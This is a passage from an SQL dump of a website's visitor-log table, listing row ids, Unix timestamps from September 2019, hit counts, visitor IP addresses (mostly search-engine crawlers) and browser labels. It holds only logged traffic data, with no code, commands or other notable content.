0,0,'141.8.188.29','other'),(447256,1567714549,2,2,0,0,'141.8.188.11','other'),(447257,1567715142,1,1,0,0,'66.249.66.134','chrome'),(447258,1567716430,1,1,0,0,'141.8.188.29','other'),(447259,1567716505,1,1,0,0,'66.249.66.134','chrome'),(447260,1567716521,2,2,0,0,'141.8.188.11','other'),(447261,1567717289,1,1,0,0,'207.46.13.204','other'),(447262,1567718257,1,1,0,0,'37.9.113.20','other'),(447263,1567719189,1,1,0,0,'141.8.188.11','other'),(447264,1567720288,1,1,0,0,'66.249.66.138','chrome'),(447265,1567720573,2,2,0,0,'66.249.66.136','chrome'),(447266,1567720949,1,1,0,0,'207.46.13.204','other'),(447267,1567721297,1,1,0,0,'40.77.167.57','other'),(447268,1567721312,1,1,0,0,'5.45.207.79','other'),(447269,1567721341,1,1,0,0,'157.245.34.112','chrome'),(447270,1567721584,1,1,0,0,'66.249.66.64','chrome'),(447271,1567721758,1,1,0,0,'141.8.188.11','other'),(447272,1567722342,1,1,0,0,'8.29.198.27','other'),(447273,1567722370,1,1,0,0,'141.8.188.29','other'),(447274,1567722731,1,1,0,0,'66.249.66.136','chrome'),(447275,1567723458,1,1,0,0,'8.29.198.27','other'),(447276,1567723719,1,1,0,0,'141.8.188.29','other'),(447277,1567723828,1,1,0,0,'178.150.43.80','chrome'),(447278,1567724002,1,1,0,0,'141.8.142.103','other'),(447279,1567724059,1,1,0,0,'66.249.66.136','chrome'),(447280,1567725576,1,1,0,0,'207.46.13.143','other'),(447281,1567725846,1,1,0,0,'207.46.13.133','other'),(447282,1567726937,3,3,0,0,'35.188.213.37','chrome'),(447283,1567727010,3,3,0,0,'34.67.52.22','chrome'),(447284,1567727127,3,3,0,0,'35.238.58.8','chrome'),(447285,1567727191,3,3,0,0,'34.67.82.99','chrome'),(447286,1567727238,3,3,0,0,'35.192.69.185','chrome'),(447287,1567727268,3,3,0,0,'35.222.146.208','chrome'),(447288,1567727550,1,1,0,0,'141.8.188.11','other'),(447289,1567729233,1,1,0,0,'66.249.66.134','chrome'),(447290,1567729239,1,1,0,0,'207.46.13.133','other'),(447291,1567729391,2,2,0,0,'141.8.188.29','other'),(447292,1567730432,1,1,0,0,'162.213.37.224','chrome'),(447293,1567730737,1,1,0,0,'66.249.66.136','chrome'),(447294,1567731005,1,1,0,0,'207.46.13.136','other'),(447295,1567731366,1,1,0,0,'157.55.39.228','other'),(447296,1567731685,1,1,0,0,'91.106.199.104','other'),(447297,1567732275,1,1,0,0,'66.249.66.138','chrome'),(447298,1567732294,2,2,0,0,'66.249.66.134','chrome'),(447299,1567732332,1,1,0,0,'141.8.188.29','other'),(447300,1567733193,1,1,0,0,'8.29.198.27','other'),(447301,1567733255,2,2,0,0,'141.8.188.29','other'),(447302,1567734258,1,1,0,0,'141.8.132.16','other'),(447303,1567734337,1,1,0,0,'8.29.198.26','other'),(447304,1567734356,1,1,0,0,'128.71.38.35','chrome'),(447305,1567734494,1,1,0,0,'66.249.66.138','chrome'),(447306,1567734922,1,1,0,0,'207.46.13.143','other'),(447307,1567734949,2,2,0,0,'207.46.13.133','other'),(447308,1567735853,1,1,0,0,'13.66.139.0','other'),(447309,1567736159,1,1,0,0,'141.8.188.29','other'),(447310,1567737088,1,1,0,0,'37.9.113.103','other'),(447311,1567737147,2,2,0,0,'141.8.188.29','other'),(447312,1567737428,1,1,0,0,'40.77.167.207','other'),(447313,1567737581,1,1,0,0,'157.245.7.76','chrome'),(447314,1567737891,1,1,0,0,'157.55.39.92','other'),(447315,1567738074,3,3,0,0,'141.8.188.11','other'),(447316,1567738098,3,3,0,0,'141.8.188.29','other'),(447317,1567738663,1,1,0,0,'91.209.11.236','other'),(447318,1567740128,1,1,0,0,'46.211.4.11','chrome'),(447319,1567740765,1,1,0,0,'178.154.171.24','other'),(447320,1567740872,1,1,0,0,'157.55.39.92','other'),(447321,1567741236,1,1,0,0,'141.8.188.11','other'),(447322,1567742662,1,1,0,0,'66.249.66.138','chrome'),(447323,1567742739,1,1,0,0,'37.9.113.103','other'),(447324,1567743496,1,1,0,0,'141.8.188.11','other'),(447325,1567743641,1,1,0,0,'193.106.30.99','chrome'),(447326,1567743772,1,1,0,0,'162.213.39.77','chrome'),(447327,1567744070,1,1,0,0,'8.29.198.25','other'),(447328,1567744384,1,1,0,0,'209.17.97.34','other'),(447329,1567745103,1,1,0,0,'62.205.134.182','other'),(447330,1567745197,1,1,0,0,'8.29.198.25','other'),(447331,1567745303,1,1,0,0,'141.8.188.29','other'),(447332,1567746464,1,1,0,0,'13.66.139.0','other'),(447333,1567746625,1,1,0,0,'141.8.188.11','other'),(447334,1567747797,1,1,0,0,'157.55.39.92','other'),(447335,1567747801,1,1,0,0,'5.45.207.79','other'),(447336,1567747907,1,1,0,0,'141.8.188.29','other'),(447337,1567748154,1,1,0,0,'91.196.178.73','chrome'),(447338,1567749111,1,1,0,0,'141.8.188.29','other'),(447339,1567749747,1,1,0,0,'5.45.207.79','other'),(447340,1567749787,1,1,0,0,'141.8.188.11','other'),(447341,1567749974,1,1,0,0,'77.111.244.108','chrome'),(447342,1567750077,1,1,0,0,'66.249.66.136','chrome'),(447343,1567750285,1,1,0,0,'46.211.73.43','chrome'),(447344,1567750312,1,1,0,0,'157.55.39.92','other'),(447345,1567750610,2,2,0,0,'141.8.188.29','other'),(447346,1567751960,1,1,0,0,'66.249.66.68','chrome'),(447347,1567752280,1,1,0,0,'141.8.188.29','other'),(447348,1567753188,1,1,0,0,'66.249.66.136','chrome'),(447349,1567753291,1,1,0,0,'37.9.113.103','other'),(447350,1567753544,1,1,0,0,'66.249.66.68','chrome'),(447351,1567753724,1,1,0,0,'207.46.13.132','other'),(447352,1567753879,1,1,0,0,'40.77.167.210','other'),(447353,1567753885,1,1,0,0,'141.8.188.29','other'),(447354,1567753954,1,1,0,0,'141.8.188.11','other'),(447355,1567754888,1,1,0,0,'141.8.188.29','other'),(447356,1567754950,1,1,0,0,'8.29.198.26','other'),(447357,1567754976,3,3,0,0,'40.77.167.195','other'),(447358,1567755746,1,1,0,0,'141.8.188.11','other'),(447359,1567755873,1,1,0,0,'176.15.41.110','msie'),(447360,1567756063,1,1,0,0,'8.29.198.26','other'),(447361,1567756760,1,1,0,0,'40.77.167.195','other'),(447362,1567757088,1,1,0,0,'195.230.119.58','chrome'),(447363,1567758262,2,2,0,0,'82.207.49.154','chrome'),(447364,1567758367,1,1,0,0,'141.8.188.11','other'),(447365,1567758576,1,1,0,0,'95.108.181.54','other'),(447366,1567758583,1,1,0,0,'141.8.188.29','other'),(447367,1567758754,5,5,0,0,'66.249.66.136','chrome'),(447368,1567758756,2,2,0,0,'66.249.66.138','chrome'),(447369,1567758775,1,1,0,0,'91.196.178.89','firefox'),(447370,1567758937,1,1,0,0,'66.249.66.68','chrome'),(447371,1567759098,1,1,0,0,'66.249.66.64','chrome'),(447372,1567759202,4,4,0,0,'66.249.66.134','chrome'),(447373,1567759544,1,1,0,0,'141.8.188.29','other'),(447374,1567759553,1,1,0,0,'141.8.188.11','other'),(447375,1567759598,1,1,0,0,'40.77.167.195','other'),(447376,1567759619,1,1,0,0,'40.77.167.15','other'),(447377,1567759780,1,1,0,0,'66.249.66.138','chrome'),(447378,1567759843,2,2,0,0,'66.249.66.68','chrome'),(447379,1567759949,1,1,0,0,'46.211.65.236','chrome'),(447380,1567760111,1,1,0,0,'207.46.13.33','other'),(447381,1567760299,1,1,0,0,'91.196.178.73','chrome'),(447382,1567760610,1,1,0,0,'66.249.66.64','chrome'),(447383,1567760685,1,1,0,0,'40.77.167.195','other'),(447384,1567760779,3,3,0,0,'66.249.66.138','chrome'),(447385,1567761283,2,2,0,0,'91.196.179.134','chrome'),(447386,1567761518,1,1,0,0,'66.249.66.134','chrome'),(447387,1567761584,1,1,0,0,'91.196.178.89','firefox'),(447388,1567762410,1,1,0,0,'207.46.13.33','other'),(447389,1567762444,2,2,0,0,'66.249.66.134','chrome'),(447390,1567762562,3,3,0,0,'66.249.66.136','chrome'),(447391,1567763069,3,3,0,0,'66.249.66.64','chrome'),(447392,1567763079,2,2,0,0,'66.249.66.138','chrome'),(447393,1567763257,1,1,0,0,'66.249.66.68','chrome'),(447394,1567763522,4,4,0,0,'66.249.66.134','chrome'),(447395,1567763561,1,1,0,0,'66.249.66.136','chrome'),(447396,1567763868,1,1,0,0,'207.46.13.33','other'),(447397,1567764244,1,1,0,0,'66.249.66.66','chrome'),(447398,1567764252,2,2,0,0,'66.249.66.138','chrome'),(447399,1567764916,2,2,0,0,'66.249.66.134','chrome'),(447400,1567764985,4,4,0,0,'66.249.66.136','chrome'),(447401,1567765277,3,3,0,0,'66.249.66.138','chrome'),(447402,1567765528,1,1,0,0,'157.55.39.50','other'),(447403,1567765801,1,1,0,0,'8.29.198.27','other'),(447404,1567765919,1,1,0,0,'77.222.143.222','msie'),(447405,1567765967,2,2,0,0,'66.249.66.136','chrome'),(447406,1567765971,4,4,0,0,'66.249.66.134','chrome'),(447407,1567766292,1,1,0,0,'91.209.11.236','other'),(447408,1567766476,1,1,0,0,'91.196.177.42','chrome'),(447409,1567766936,1,1,0,0,'8.29.198.27','other'),(447410,1567767981,4,4,0,0,'66.249.66.134','chrome'),(447411,1567768126,2,2,0,0,'66.249.66.64','chrome'),(447412,1567768406,2,2,0,0,'66.249.66.138','chrome'),(447413,1567768511,1,1,0,0,'207.46.13.78','other'),(447414,1567769126,1,1,0,0,'109.74.154.72','chrome'),(447415,1567769452,1,1,0,0,'66.249.66.138','chrome'),(447416,1567769474,2,2,0,0,'66.249.66.134','chrome'),(447417,1567769664,1,1,0,0,'66.249.66.66','chrome'),(447418,1567769799,1,1,0,0,'207.46.13.33','other'),(447419,1567770299,5,5,0,0,'104.198.140.193','chrome'),(447420,1567771147,1,1,0,0,'207.46.13.78','other'),(447421,1567771227,1,1,0,0,'91.196.178.72','chrome'),(447422,1567771485,1,1,0,0,'130.180.220.29','chrome'),(447423,1567772084,3,3,0,0,'66.249.66.136','chrome'),(447424,1567772164,2,2,0,0,'66.249.66.138','chrome'),(447425,1567772402,1,1,0,0,'66.249.66.134','chrome'),(447426,1567772588,1,1,0,0,'66.249.66.64','chrome'),(447427,1567772903,7,7,0,0,'34.68.129.146','firefox'),(447428,1567774162,1,1,0,0,'157.55.39.175','other'),(447429,1567774890,3,3,0,0,'66.249.66.134','chrome'),(447430,1567775454,1,1,0,0,'157.55.39.50','other'),(447431,1567776030,1,1,0,0,'66.249.66.68','chrome'),(447432,1567776284,1,1,0,0,'66.249.66.138','chrome'),(447433,1567776683,1,1,0,0,'8.29.198.26','other'),(447434,1567776728,1,1,0,0,'46.211.66.11','chrome'),(447435,1567776925,1,1,0,0,'66.249.66.136','chrome'),(447436,1567777535,2,2,0,0,'66.249.66.66','chrome'),(447437,1567777823,1,1,0,0,'8.29.198.27','other'),(447438,1567777920,3,3,0,0,'66.249.66.134','chrome'),(447439,1567778323,3,3,0,0,'66.249.66.138','chrome'),(447440,1567778338,2,2,0,0,'66.249.66.136','chrome'),(447441,1567778350,2,2,0,0,'207.46.13.3','other'),(447442,1567778683,2,2,0,0,'66.249.66.66','chrome'),(447443,1567779288,3,3,0,0,'66.249.66.138','chrome'),(447444,1567779413,4,4,0,0,'66.249.66.134','chrome'),(447445,1567779854,3,3,0,0,'66.249.66.136','chrome'),(447446,1567780106,1,1,0,0,'37.204.247.58','msie'),(447447,1567780476,1,1,0,0,'207.46.13.78','other'),(447448,1567780770,3,3,0,0,'66.249.66.134','chrome'),(447449,1567780845,1,1,0,0,'66.249.66.64','chrome'),(447450,1567780934,7,7,0,0,'66.249.66.136','chrome'),(447451,1567781169,2,2,0,0,'66.249.66.138','chrome'),(447452,1567781916,3,3,0,0,'66.249.66.134','chrome'),(447453,1567781919,2,2,0,0,'66.249.66.136','chrome'),(447454,1567782298,1,1,0,0,'91.209.11.236','other'),(447455,1567782315,1,1,0,0,'66.249.66.138','chrome'),(447456,1567783806,1,1,0,0,'66.249.66.136','chrome'),(447457,1567783893,3,3,0,0,'45.63.39.63','firefox'),(447458,1567784687,2,2,0,0,'66.249.66.134','chrome'),(447459,1567785351,1,1,0,0,'207.46.13.3','other'),(447460,1567786043,1,1,0,0,'91.196.178.79','firefox'),(447461,1567786088,1,1,0,0,'172.111.183.59','chrome'),(447462,1567786586,1,1,0,0,'66.249.66.138','chrome'),(447463,1567786867,2,2,0,0,'207.46.13.10','other'),(447464,1567787090,2,2,0,0,'66.249.66.136','chrome'),(447465,1567787550,1,1,0,0,'207.46.13.3','other'),(447466,1567787568,1,1,0,0,'8.29.198.26','other'),(447467,1567787895,2,2,0,0,'66.249.66.138','chrome'),(447468,1567788365,3,3,0,0,'66.249.66.136','chrome'),(447469,1567788505,4,4,0,0,'66.249.66.134','chrome'),(447470,1567788709,1,1,0,0,'8.29.198.27','other'),(447471,1567789265,1,1,0,0,'40.77.167.58','other'),(447472,1567789267,2,2,0,0,'66.249.66.66','chrome'),(447473,1567789509,2,2,0,0,'66.249.66.138','chrome'),(447474,1567789674,1,1,0,0,'66.249.66.136','chrome'),(447475,1567790301,1,1,0,0,'66.249.66.68','chrome'),(447476,1567790420,1,1,0,0,'66.249.66.64','chrome'),(447477,1567790496,1,1,0,0,'46.211.112.220','chrome'),(447478,1567790658,2,2,0,0,'66.249.66.134','chrome'),(447479,1567790719,1,1,0,0,'207.46.13.3','other'),(447480,1567791745,1,1,0,0,'91.209.11.236','other'),(447481,1567792309,1,1,0,0,'77.222.143.222','msie'),(447482,1567792524,1,1,0,0,'66.249.66.64','chrome'),(447483,1567793006,1,1,0,0,'66.249.66.138','chrome'),(447484,1567793177,1,1,0,0,'66.249.66.134','chrome'),(447485,1567793671,2,2,0,0,'66.249.66.136','chrome'),(447486,1567794174,1,1,0,0,'40.77.167.198','other'),(447487,1567794665,1,1,0,0,'66.249.66.138','chrome'),(447488,1567795964,1,1,0,0,'66.249.66.136','chrome'),(447489,1567796198,1,1,0,0,'207.46.13.3','other'),(447490,1567796275,2,2,0,0,'66.249.66.68','chrome'),(447491,1567796409,3,3,0,0,'91.209.11.236','other'),(447492,1567797117,1,1,0,0,'66.249.66.64','chrome'),(447493,1567797137,3,3,0,0,'66.249.66.134','chrome'),(447494,1567797157,1,1,0,0,'66.249.66.136','chrome'),(447495,1567797650,1,1,0,0,'66.249.66.138','chrome'),(447496,1567797905,2,2,0,0,'91.209.11.236','other'),(447497,1567798469,1,1,0,0,'8.29.198.26','other'),(447498,1567798509,1,1,0,0,'66.249.66.64','chrome'),(447499,1567799178,1,1,0,0,'66.249.66.136','chrome'),(447500,1567799573,1,1,0,0,'8.29.198.26','other'),(447501,1567800394,2,2,0,0,'66.249.66.134','chrome'),(447502,1567801438,2,2,0,0,'66.249.66.138','chrome'),(447503,1567801554,1,1,0,0,'66.249.66.134','chrome'),(447504,1567801776,1,1,0,0,'66.249.66.68','chrome'),(447505,1567801859,2,2,0,0,'66.249.66.136','chrome'),(447506,1567802139,2,2,0,0,'40.77.167.151','other'),(447507,1567802578,1,1,0,0,'66.249.66.64','chrome'),(447508,1567803360,4,4,0,0,'66.249.66.134','chrome'),(447509,1567803419,2,2,0,0,'40.77.167.144','other'),(447510,1567803625,1,1,0,0,'66.249.66.66','chrome'),(447511,1567803737,1,1,0,0,'5.188.84.76','chrome'),(447512,1567804284,1,1,0,0,'66.249.66.136','chrome'),(447513,1567804397,2,2,0,0,'66.249.66.134','chrome'),(447514,1567804496,2,2,0,0,'66.249.66.138','chrome'),(447515,1567804585,1,1,0,0,'207.46.13.5','other'),(447516,1567805265,2,2,0,0,'88.99.2.203','other'),(447517,1567805271,1,1,0,0,'178.133.242.189','chrome'),(447518,1567805399,1,1,0,0,'66.249.66.136','chrome'),(447519,1567805978,2,2,0,0,'66.249.66.138','chrome'),(447520,1567807101,2,2,0,0,'66.249.66.138','chrome'),(447521,1567807194,1,1,0,0,'66.249.66.66','chrome'),(447522,1567807244,1,1,0,0,'40.77.167.144','other'),(447523,1567807316,1,1,0,0,'40.77.167.141','other'),(447524,1567807392,2,2,0,0,'207.46.13.5','other'),(447525,1567808682,1,1,0,0,'66.249.66.66','chrome'),(447526,1567809343,1,1,0,0,'8.29.198.27','other'),(447527,1567809520,2,2,0,0,'157.55.39.51','other'),(447528,1567810335,1,1,0,0,'66.249.66.136','chrome'),(447529,1567810432,1,1,0,0,'8.29.198.26','other'),(447530,1567810899,1,1,0,0,'157.55.39.51','other'),(447531,1567811602,1,1,0,0,'66.249.66.136','chrome'),(447532,1567812116,1,1,0,0,'66.249.66.134','chrome'),(447533,1567812287,1,1,0,0,'66.249.66.138','chrome'),(447534,1567812550,1,1,0,0,'66.249.66.64','chrome'),(447535,1567812582,1,1,0,0,'66.249.66.136','chrome'),(447536,1567813535,3,3,0,0,'35.238.207.144','chrome'),(447537,1567813815,3,3,0,0,'34.68.9.174','chrome'),(447538,1567813851,2,2,0,0,'66.249.66.134','chrome'),(447539,1567814006,3,3,0,0,'35.224.73.123','chrome'),(447540,1567814090,2,2,0,0,'66.249.66.136','chrome'),(447541,1567814140,3,3,0,0,'104.154.22.232','chrome'),(447542,1567814263,1,1,0,0,'35.192.95.29','chrome'),(447543,1567814264,2,2,0,0,'35.192.95.29','chrome'),(447544,1567814349,3,3,0,0,'104.197.245.105','chrome'),(447545,1567814608,1,1,0,0,'157.55.39.51','other'),(447546,1567815490,1,1,0,0,'40.77.167.141','other'),(447547,1567816374,1,1,0,0,'157.55.39.51','other'),(447548,1567819384,1,1,0,0,'66.249.66.68','chrome'),(447549,1567819434,1,1,0,0,'66.249.66.66','chrome'),(447550,1567819776,1,1,0,0,'157.55.39.51','other'),(447551,1567819845,1,1,0,0,'66.249.66.134','chrome'),(447552,1567820030,1,1,0,0,'66.249.66.138','chrome'),(447553,1567820058,2,2,0,0,'207.46.13.241','other'),(447554,1567820206,1,1,0,0,'8.29.198.25','other'),(447555,1567821285,1,1,0,0,'8.29.198.26','other'),(447556,1567821309,1,1,0,0,'66.249.66.68','chrome'),(447557,1567821460,1,1,0,0,'157.55.39.122','other'),(447558,1567821637,2,2,0,0,'66.249.66.134','chrome'),(447559,1567822345,2,2,0,0,'91.209.11.236','other'),(447560,1567822899,1,1,0,0,'40.77.167.64','other'),(447561,1567823562,2,2,0,0,'91.209.11.236','other'),(447562,1567823616,2,2,0,0,'66.249.66.136','chrome'),(447563,1567824025,1,1,0,0,'66.249.66.68','chrome'),(447564,1567824208,1,1,0,0,'40.77.167.64','other'),(447565,1567824376,1,1,0,0,'66.249.66.64','chrome'),(447566,1567824505,1,1,0,0,'157.55.39.141','other'),(447567,1567824992,1,1,0,0,'66.249.66.138','chrome'),(447568,1567825128,1,1,0,0,'66.249.66.136','chrome'),(447569,1567826130,1,1,0,0,'157.55.39.141','other'),(447570,1567826630,1,1,0,0,'66.249.66.134','chrome'),(447571,1567826841,1,1,0,0,'207.46.13.97','other'),(447572,1567826927,2,2,0,0,'66.249.66.138','chrome'),(447573,1567827051,1,1,0,0,'66.249.66.66','chrome'),(447574,1567827828,1,1,0,0,'66.249.66.136','chrome'),(447575,1567827973,36,36,0,0,'95.91.15.240','other'),(447576,1567828118,1,1,0,0,'207.46.13.97','other'),(447577,1567828428,3,3,0,0,'66.249.66.138','chrome'),(447578,1567829220,2,2,0,0,'66.249.66.136','chrome'),(447579,1567829460,1,1,0,0,'66.249.66.66','chrome'),(447580,1567829874,2,2,0,0,'157.55.39.141','other'),(447581,1567830207,2,2,0,0,'66.249.66.134','chrome'),(447582,1567830920,1,1,0,0,'66.249.66.68','chrome'),(447583,1567831070,1,1,0,0,'8.29.198.25','other'),(447584,1567831139,50,50,0,0,'5.9.154.68','other'),(447585,1567831278,1,1,0,0,'34.220.154.66','other'),(447586,1567831384,1,1,0,0,'66.249.66.136','chrome'),(447587,1567831565,1,1,0,0,'62.205.134.182','other'),(447588,1567832129,1,1,0,0,'8.29.198.25','other'),(447589,1567832274,3,3,0,0,'66.249.66.134','chrome'),(447590,1567832281,1,1,0,0,'207.46.13.97','other'),(447591,1567832508,1,1,0,0,'91.196.178.130','firefox'),(447592,1567832543,1,1,0,0,'66.249.66.138','chrome'),(447593,1567832576,1,1,0,0,'207.46.13.185','other'),(447594,1567832694,1,1,0,0,'157.55.39.154','other'),(447595,1567832925,1,1,0,0,'91.209.11.236','other'),(447596,1567833014,1,1,0,0,'66.249.66.68','chrome'),(447597,1567833183,1,1,0,0,'66.249.66.64','chrome'),(447598,1567833825,1,1,0,0,'66.249.66.138','chrome'),(447599,1567834236,10,10,0,0,'89.163.146.110','other'),(447600,1567834887,1,1,0,0,'157.55.39.141','other'),(447601,1567835181,1,1,0,0,'40.77.167.172','other'),(447602,1567835497,1,1,0,0,'5.9.70.72','other'),(447603,1567835552,1,1,0,0,'40.77.167.15','other'),(447604,1567835752,3,3,0,0,'66.249.66.136','chrome'),(447605,1567836364,1,1,0,0,'66.249.66.138','chrome'),(447606,1567836693,2,2,0,0,'66.249.66.136','chrome'),(447607,1567836726,1,1,0,0,'66.249.66.134','chrome'),(447608,1567836780,1,1,0,0,'66.249.66.66','chrome'),(447609,1567837359,1,1,0,0,'66.249.66.138','chrome'),(447610,1567837736,1,1,0,0,'66.249.66.136','chrome'),(447611,1567837870,1,1,0,0,'207.46.13.97','other'),(447612,1567838474,1,1,0,0,'157.55.39.141','other'),(447613,1567838938,1,1,0,0,'46.211.73.83','chrome'),(447614,1567839262,1,1,0,0,'66.249.66.134','chrome'),(447615,1567839294,2,2,0,0,'66.249.66.64','chrome'),(447616,1567839658,1,1,0,0,'112.204.69.250','chrome'),(447617,1567839926,1,1,0,0,'207.46.13.97','other'),(447618,1567840507,1,1,0,0,'87.250.224.118','other'),(447619,1567840994,1,1,0,0,'157.55.39.141','other'),(447620,1567840998,1,1,0,0,'207.46.13.97','other'),(447621,1567841003,1,1,0,0,'40.77.167.15','other'),(447622,1567841008,2,2,0,0,'157.55.39.154','other'),(447623,1567841353,1,1,0,0,'66.249.66.134','chrome'),(447624,1567841437,1,1,0,0,'178.154.171.17','other'),(447625,1567841621,1,1,0,0,'66.249.66.136','chrome'),(447626,1567841675,1,1,0,0,'66.249.66.68','chrome'),(447627,1567841932,1,1,0,0,'8.29.198.25','other'),(447628,1567841969,1,1,0,0,'66.249.66.66','chrome'),(447629,1567842209,1,1,0,0,'87.250.224.118','other'),(447630,1567842638,1,1,0,0,'40.77.167.15','other'),(447631,1567842972,1,1,0,0,'8.29.198.26','other'),(447632,1567843206,1,1,0,0,'66.249.66.136','chrome'),(447633,1567844060,1,1,0,0,'87.250.224.118','other'),(447634,1567844693,1,1,0,0,'193.106.30.99','chrome'),(447635,1567844705,1,1,0,0,'87.250.224.81','other'),(447636,1567844775,1,1,0,0,'66.249.66.138','chrome'),(447637,1567844780,1,1,0,0,'213.180.203.40','other'),(447638,1567845599,1,1,0,0,'5.45.207.8','other'),(447639,1567845781,1,1,0,0,'66.249.66.138','chrome'),(447640,1567846022,1,1,0,0,'66.249.66.134','chrome'),(447641,1567846106,1,1,0,0,'5.255.253.38','other'),(447642,1567846156,1,1,0,0,'141.8.188.65','other'),(447643,1567846637,2,2,0,0,'141.8.188.29','other'),(447644,1567847329,1,1,0,0,'37.113.10.155','chrome'),(447645,1567847590,1,1,0,0,'66.249.66.134','chrome'),(447646,1567848449,2,2,0,0,'66.249.66.138','chrome'),(447647,1567848570,1,1,0,0,'66.249.66.134','chrome'),(447648,1567849403,2,2,0,0,'66.249.66.136','chrome'),(447649,1567849497,2,2,0,0,'66.249.66.134','chrome'),(447650,1567849774,1,1,0,0,'157.55.39.127','other'),(447651,1567851666,1,1,0,0,'157.55.39.54','other'),(447652,1567851785,2,2,0,0,'141.8.188.29','other'),(447653,1567851886,1,1,0,0,'46.42.168.118','msie'),(447654,1567852553,1,1,0,0,'141.8.188.11','other'),(447655,1567852613,1,1,0,0,'5.45.207.79','other'),(447656,1567852816,1,1,0,0,'8.29.198.25','other'),(447657,1567853344,1,1,0,0,'109.74.154.72','chrome'),(447658,1567853623,1,1,0,0,'66.249.66.136','chrome'),(447659,1567853823,1,1,0,0,'8.29.198.26','other'),(447660,1567854266,2,2,0,0,'141.8.188.29','other'),(447661,1567854595,1,1,0,0,'209.17.96.138','other'),(447662,1567855057,1,1,0,0,'157.55.39.57','other'),(447663,1567855182,2,2,0,0,'157.55.39.152','other'),(447664,1567855365,1,1,0,0,'40.77.167.154','other'),(447665,1567855376,1,1,0,0,'31.13.127.16','other'),(447666,1567856339,1,1,0,0,'40.77.167.154','other'),(447667,1567856382,1,1,0,0,'157.55.39.57','other'),(447668,1567856760,1,1,0,0,'94.242.203.243','chrome'),(447669,1567856850,1,1,0,0,'91.196.178.61','chrome'),(447670,1567856867,2,2,0,0,'104.197.87.104','chrome'),(447671,1567856866,1,1,0,0,'104.197.87.104','chrome'),(447672,1567856997,3,3,0,0,'35.239.243.129','chrome'),(447673,1567857079,3,3,0,0,'34.67.38.59','chrome'),(447674,1567857141,3,3,0,0,'104.154.71.183','chrome'),(447675,1567857163,3,3,0,0,'34.68.13.12','chrome'),(447676,1567857180,3,3,0,0,'35.202.220.202','chrome'),(447677,1567857643,2,2,0,0,'157.55.39.57','other'),(447678,1567857668,1,1,0,0,'40.77.167.154','other'),(447679,1567857711,1,1,0,0,'87.250.224.47','other'),(447680,1567857969,2,2,0,0,'40.77.167.21','other'),(447681,1567858370,1,1,0,0,'66.249.66.138','chrome'),(447682,1567858614,1,1,0,0,'141.8.142.144','other'),(447683,1567858849,2,2,0,0,'66.249.66.66','chrome'),(447684,1567859361,2,2,0,0,'66.249.66.138','chrome'),(447685,1567859847,1,1,0,0,'141.8.188.29','other'),(447686,1567860895,12,12,0,0,'157.55.39.152','other'),(447687,1567860909,17,17,0,0,'40.77.167.154','other'),(447688,1567860928,16,16,0,0,'40.77.167.21','other'),(447689,1567860952,21,21,0,0,'157.55.39.57','other'),(447690,1567861053,1,1,0,0,'66.249.66.64','chrome'),(447691,1567861464,2,2,0,0,'66.249.66.138','chrome'),(447692,1567861609,1,1,0,0,'176.9.154.47','other'),(447693,1567861614,1,1,0,0,'144.76.70.236','chrome'),(447694,1567861756,1,1,0,0,'46.211.103.243','chrome'),(447695,1567862727,1,1,0,0,'66.249.66.68','chrome'),(447696,1567862978,1,1,0,0,'207.46.13.89','other'),(447697,1567862980,1,1,0,0,'5.45.207.79','other'),(447698,1567863384,1,1,0,0,'157.55.39.255','other'),(447699,1567863689,1,1,0,0,'8.29.198.25','other'),(447700,1567863967,1,1,0,0,'141.8.142.108','other'),(447701,1567864097,6,6,0,0,'198.27.121.92','firefox'),(447702,1567864176,1,1,0,0,'157.55.39.152','other'),(447703,1567864195,2,2,0,0,'66.249.66.136','chrome'),(447704,1567864538,1,1,0,0,'66.249.66.138','chrome'),(447705,1567864670,1,1,0,0,'8.29.198.26','other'),(447706,1567864758,2,2,0,0,'66.249.66.64','chrome'),(447707,1567865082,2,2,0,0,'66.249.66.134','chrome'),(447708,1567865404,2,2,0,0,'66.249.66.136','chrome'),(447709,1567865440,1,1,0,0,'66.249.66.66','chrome'),(447710,1567865470,1,1,0,0,'66.249.66.138','chrome'),(447711,1567866134,1,1,0,0,'213.180.203.9','other'),(447712,1567867775,1,1,0,0,'13.66.139.0','other'),(447713,1567867797,2,2,0,0,'66.249.66.138','chrome'),(447714,1567867929,1,1,0,0,'66.249.66.134','chrome'),(447715,1567868041,2,2,0,0,'141.8.188.29','other'),(447716,1567868215,2,2,0,0,'157.55.39.152','other'),(447717,1567868944,2,2,0,0,'66.249.66.136','chrome'),(447718,1567869796,1,1,0,0,'66.249.66.66','chrome'),(447719,1567869994,1,1,0,0,'66.249.66.64','chrome'),(447720,1567870335,1,1,0,0,'54.36.149.104','other'),(447721,1567870364,1,1,0,0,'178.154.171.17','other'),(447722,1567870790,1,1,0,0,'66.249.66.138','chrome'),(447723,1567870872,1,1,0,0,'66.249.66.66','chrome'),(447724,1567870899,1,1,0,0,'157.55.39.57','other'),(447725,1567871411,1,1,0,0,'54.36.149.91','other'),(447726,1567871630,1,1,0,0,'91.196.178.182','chrome'),(447727,1567871823,1,1,0,0,'66.249.66.136','chrome'),(447728,1567871848,1,1,0,0,'40.77.167.119','other'),(447729,1567871971,1,1,0,0,'51.255.65.46','other'),(447730,1567872366,1,1,0,0,'54.36.149.91','other'),(447731,1567872762,1,1,0,0,'91.196.178.182','chrome'),(447732,1567872824,1,1,0,0,'141.8.142.162','other'),(447733,1567872884,2,2,0,0,'66.249.66.68','chrome'),(447734,1567873350,1,1,0,0,'157.55.39.152','other'),(447735,1567873666,1,1,0,0,'66.249.66.64','chrome'),(447736,1567874029,1,1,0,0,'213.180.203.17','other'),(447737,1567874100,2,2,0,0,'66.249.66.138','chrome'),(447738,1567874117,2,2,0,0,'66.249.66.136','chrome'),(447739,1567874137,2,2,0,0,'66.249.66.134','chrome'),(447740,1567874346,1,1,0,0,'157.55.39.152','other'),(447741,1567874569,1,1,0,0,'8.29.198.26','other'),(447742,1567875359,1,1,0,0,'66.249.66.68','chrome'),(447743,1567875369,2,2,0,0,'66.249.66.134','chrome'),(447744,1567875491,1,1,0,0,'66.249.66.136','chrome'),(447745,1567875517,1,1,0,0,'8.29.198.25','other'),(447746,1567875585,1,1,0,0,'66.249.66.66','chrome'),(447747,1567875616,1,1,0,0,'80.95.44.9','chrome'),(447748,1567875669,1,1,0,0,'213.180.203.17','other'),(447749,1567876537,1,1,0,0,'91.196.178.26','chrome'),(447750,1567876865,1,1,0,0,'5.45.207.76','other'),(447751,1567876994,1,1,0,0,'54.36.149.18','other'),(447752,1567877112,2,2,0,0,'66.249.66.134','chrome'),(447753,1567877197,1,1,0,0,'54.36.149.74','other'),(447754,1